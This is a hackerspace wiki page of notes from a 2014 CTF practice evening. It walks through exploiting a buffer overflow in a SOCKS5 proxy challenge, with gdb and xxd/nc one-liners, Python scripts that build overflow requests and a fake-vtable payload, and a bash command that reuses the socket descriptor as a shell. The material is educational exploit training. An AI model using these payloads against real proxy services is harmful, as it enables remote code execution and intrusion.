From Technologia Incognita
Latest revision as of 19:43, 4 August 2014

CTF-practice-evening:2014-08-04
Date 2014/08/04
Time
Location ACTA
Type Workshop
Contact Melanie

Capture The Flag evening - Part 23

  • 4 August, 2014 - 7 PM
  • Please bring along a laptop with you!!!

General CTF Info

Binary Exploitation

  • Brainsmoke is talking about binary exploitation today

Examining the challenge

  • objdump -d: see the disassembly; sometimes symbols are present
    • This example has mangled C++ symbols (objdump -dC or c++filt demangles them)
  • From running it, the program appears to be a daemon of some kind: a SOCKS proxy
    • This is a proxy for TCP; the protocol details (RFC 1928 for SOCKS5) are easy to find with Google
    • netstat -uplanet shows which ports it is listening on (1080 is the usual SOCKS port, and the one used below)
  • What was added between SOCKS4 and SOCKS5? (new code is where a bug is most likely)
    • Authentication (method negotiation) and connecting directly to a domain name
    • Most of the fields are fixed length
    • But the domain name is a string, so it could have a buffer overflow
    • The name length is a single byte; if the daemon keeps it in a signed char, 0xff becomes -1
    • A negative count handed to a read as an unsigned size becomes huge, so the daemon will try to read far more than 255 bytes
  • We want to find out what happens when we tell the program the name is 255 bytes long and then send far more than that
    • We need to establish a connection
    • We need to speak SOCKS5 (version byte 0x05)

Verifying the buffer overflow

  • Use xxd to construct the messages (it converts hex to binary and back)
    • Example: xxd -r -p <<< 41414141410a prints AAAAA followed by a newline (0x41 = 'A', 0x0a = '\n')
    • xxd -r -p <<< 050100 | nc localhost 1080 | dd bs=1 > file (the greeting: version 5, one method offered, method 0 = no authentication)
    • hexdump -C file (per the RFC, a proxy that accepts no-auth answers 05 00: version 5, method 0 chosen)
    • (xxd -r -p <<< 05010005010003ff; python -c 'print "A"*2000') | nc localhost 1080 | dd bs=1 > file (greeting plus a CONNECT request: 05 01 00 = version 5, connect, reserved; 03 = address type domain name; ff = name length 255; then 2000 bytes of A)
    • We're following the protocol here, only lying about the length
    • It crashed: a child exited with signal 6 (SIGABRT)
    • Use gdb to catch the crash; with a forking daemon, follow the child that handles the connection (set follow-fork-mode child) or attach to it once it exists
    • Now we send the payload; nothing crashed visibly, so the child that gdb has stopped must be the one holding our connection
    • Continue it, and we see the segfault
    • info reg shows the register contents
    • eax now holds 0x41414141, our A's
    • Also look at what the instruction pointer (eip) points at
    • x/i $eip shows: call *0x8(%eax)
    • So we control eax, and the call takes its function pointer from eax+8: we can make it call code we supply (this has the shape of a C++ virtual call, which fits the mangled symbols)
    • x/1000i <address> disassembles a long stretch from the right place to see the surrounding code
    • x/32x 0x8058b80-32 shows 16 bytes of junk, then our data, then the address that we need
    • (The input you sent is often visible in the dmesg line logged for the segfault as well)
    • (xxd -r -p <<< 05010005010003ff; python -c 'print "A"*16 + "ABCD" + "A"*2000') | nc localhost 1080 | dd bs=1 > file: if eax now reads 0x44434241 ("ABCD" little-endian), the overwritten pointer sits 16 bytes into our data
    • Metasploit's cyclic patterns (pattern_create.rb / pattern_offset.rb) do this offset search for you
  • He also used his own emulator with an ELF loader
    • minemu
    • It produces a taint-tracking dump
    • We can see that there's a second area where the tainted (attacker-supplied) data is stored
    • We have data at a known location, which is where we want to put our code
    • Note down that address
    • ebx is a heap pointer; with ASLR enabled it would land in a different place each run, so the known-address trick only works while ASLR is off
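The two steps above, framing the SOCKS5 messages and pinning the offset of the overwritten pointer, as an added Python 3 example. This is not the speaker's script and not the daemon's code; the message layout follows RFC 1928, the cyclic pattern reproduces Metasploit's Aa0Aa1... scheme, and the host/port (localhost:1080), the function names and the sample inputs are assumptions made for the example. The 0x41414141 and "ABCD" probes from the notes are reproduced as constructed inputs.

```python
import socket
import string
import struct

# Constructed for this page from RFC 1928; none of this is the daemon's code.
SOCKS_VERSION = 5
METHOD_NOAUTH = 0
CMD_CONNECT = 1
ATYP_DOMAIN = 3


def socks5_greeting(methods=(METHOD_NOAUTH,)):
    """VER | NMETHODS | METHODS: the 05 01 00 sent first in the notes above."""
    return bytes([SOCKS_VERSION, len(methods)]) + bytes(methods)


def socks5_connect_domain(name, port=80, length_byte=None):
    """VER | CMD | RSV | ATYP=3 | LEN | NAME | PORT (big-endian).

    LEN is a single byte.  A well-behaved client sets it to len(name);
    length_byte lets us announce 0xff and still append as many name
    bytes as we like, which is what the xxd one-liner above does.
    """
    if length_byte is None:
        length_byte = len(name)
    if not 0 <= length_byte <= 0xFF:
        raise ValueError("LEN must fit in one byte")
    header = bytes([SOCKS_VERSION, CMD_CONNECT, 0, ATYP_DOMAIN, length_byte])
    return header + name + struct.pack(">H", port)


def length_as_signed(length_byte):
    """How a daemon that keeps LEN in a signed char sees it: 0xff -> -1.
    Passed to read()/memcpy as size_t on 32-bit x86, -1 becomes 0xffffffff."""
    signed = struct.unpack("b", bytes([length_byte]))[0]
    return signed, signed & 0xFFFFFFFF


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2 ... Every 4-byte window
    is unique within the first 20280 bytes, so a register value pins
    the offset at which it was read from our data."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, reg_value):
    """Map a 32-bit value from `info reg` back to an offset in the pattern.
    The register holds the bytes little-endian, so pack it that way."""
    needle = struct.pack("<I", reg_value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("0x%08x does not occur in the pattern" % reg_value)
    return offset


def hex_stream(name, length_byte=0xFF):
    """Greeting + request as one hex string, ready for `xxd -r -p | nc`."""
    stream = socks5_greeting() + socks5_connect_domain(name, length_byte=length_byte)
    return stream.hex()


def send_request(host, port, name, length_byte=0xFF):
    """The same exchange over a socket, reading the method-select reply in
    between (a proxy that accepts no-auth answers 05 00 per the RFC).
    Not exercised here; point it at the target (assumed localhost:1080)."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(socks5_greeting())
        reply = sock.recv(2)
        if reply != bytes([SOCKS_VERSION, METHOD_NOAUTH]):
            raise RuntimeError("unexpected method-select reply: %r" % reply)
        sock.sendall(socks5_connect_domain(name, length_byte=length_byte))
        return sock.recv(512)  # whatever comes back before the child dies


if __name__ == "__main__":
    # Constructed inputs: the two probes from the notes, then a cyclic one.
    print(hex_stream(b"A" * 2000)[:40], "...")
    print(hex_stream(b"A" * 16 + b"ABCD" + b"A" * 2000)[:60], "...")
    print(length_as_signed(0xFF))                 # (-1, 4294967295)
    cyclic = pattern_create(2000)
    # Pretend gdb showed eax = 0x61413561 after sending the cyclic name.
    print(pattern_offset(cyclic, 0x61413561))     # 16
```

Feed the output of hex_stream to `xxd -r -p | nc localhost 1080` to reproduce the one-liners exactly, or call send_request against the running daemon; pattern_offset expects the register value as printed by `info reg`, not the bytes as they appear in memory.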

Crafting the exploit

  • He's turning the command-line one-liner into a proper Python program
  • He's reusing socket routines from an old exploit
  • He's also digging up previously used shellcode; the sample he's using works on many architectures, and everything appended after it is executed as a shell command
  • He's opening a shell: he's trying to reuse the connection's file descriptors from bash, so the shell's input and output travel over the SOCKS connection
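The payload layout this exploit needs, as an added Python 3 example that is not the speaker's program. It assumes the facts recovered with gdb above and nothing more: our name bytes land at a fixed heap address (ASLR off), the pointer loaded into eax sits 16 bytes into them, and the crashing instruction is `call *0x8(%eax)`. The concrete address 0x8058b70, the int3 stand-in for the real shellcode, the file-descriptor number and the function names are assumptions for the example; the reusable multi-architecture shellcode from the notes is not reproduced.

```python
import struct

# Assumed from the gdb session in the notes, not measured here:
VPTR_OFFSET = 16        # where "ABCD" had to go to show up in eax
CALL_SLOT = 8           # displacement in `call *0x8(%eax)`
DATA_ADDR = 0x8058B70   # assumed: our data starts 16 bytes before 0x8058b80

# Stand-in "shellcode": int3 traps in gdb, so control reaching it proves
# the chain works before the real shellcode and its command string go in.
TRAP_SHELLCODE = b"\xcc" * 8


def p32(value):
    return struct.pack("<I", value)


def shell_command(fd):
    """Hypothetical trailing command for 'everything after me is a command'
    style shellcode: reuse the connection's descriptor from bash."""
    return "bash -i <&%d >&%d 2>&%d" % (fd, fd, fd)


def build_payload(data_addr, shellcode, total_len=2000):
    """filler | fake vptr | fake vtable (slots 0, 4, 8) | shellcode | padding

    The overwritten pointer is aimed back into our own data, where a fake
    vtable has its +8 slot pointing at the shellcode that follows it.
    """
    vtable_off = VPTR_OFFSET + 4
    shell_off = vtable_off + CALL_SLOT + 4
    payload = bytearray(b"A" * VPTR_OFFSET)
    payload += p32(data_addr + vtable_off)        # this value ends up in eax
    for _ in range(0, CALL_SLOT + 4, 4):          # fill every slot, +8 is the one used
        payload += p32(data_addr + shell_off)
    payload += shellcode
    if len(payload) > total_len:
        raise ValueError("shellcode too long for the overflow size")
    payload += b"A" * (total_len - len(payload))  # keep the overflow reaching the object
    return bytes(payload)


def resolve_call_target(payload, data_addr):
    """Model the crashing instruction on our bytes:
    eax = *(data_addr + 16); target = *(eax + 8).
    A read outside the controlled data means the chain is broken."""
    def read32(addr):
        off = addr - data_addr
        if not 0 <= off <= len(payload) - 4:
            raise ValueError("dereference outside our data: 0x%08x" % addr)
        return struct.unpack("<I", payload[off:off + 4])[0]
    eax = read32(data_addr + VPTR_OFFSET)
    return read32(eax + CALL_SLOT)


def bytes_present(payload, candidates=b"\x00\n\r"):
    """Which of the candidate bytes occur in the payload.  Whether any of
    them would cut the daemon's copy short is for the disassembly to tell."""
    return bytes(b for b in candidates if b in payload)


def socks5_wrap(name):
    """Greeting plus CONNECT request with ATYP=domain and LEN=0xff, the same
    framing as the xxd one-liners in the notes (port 80 appended)."""
    return bytes.fromhex("050100" "05010003ff") + name + struct.pack(">H", 80)


if __name__ == "__main__":
    payload = build_payload(DATA_ADDR, TRAP_SHELLCODE)
    target = resolve_call_target(payload, DATA_ADDR)
    print("call target 0x%08x, shellcode at +%d" % (target, target - DATA_ADDR))
    print("suspicious bytes:", bytes_present(payload))
    stream = socks5_wrap(payload)   # hand this to the socket code from the old exploit
    print(len(stream), "bytes on the wire")
```

Swap TRAP_SHELLCODE for real shellcode only after gdb reports the int3 being hit at the expected address; with the command-style shellcode from the notes, shell_command(fd) is what gets appended after it, with fd taken from the daemon's open descriptors (ls -l /proc/<pid>/fd) for the connected socket.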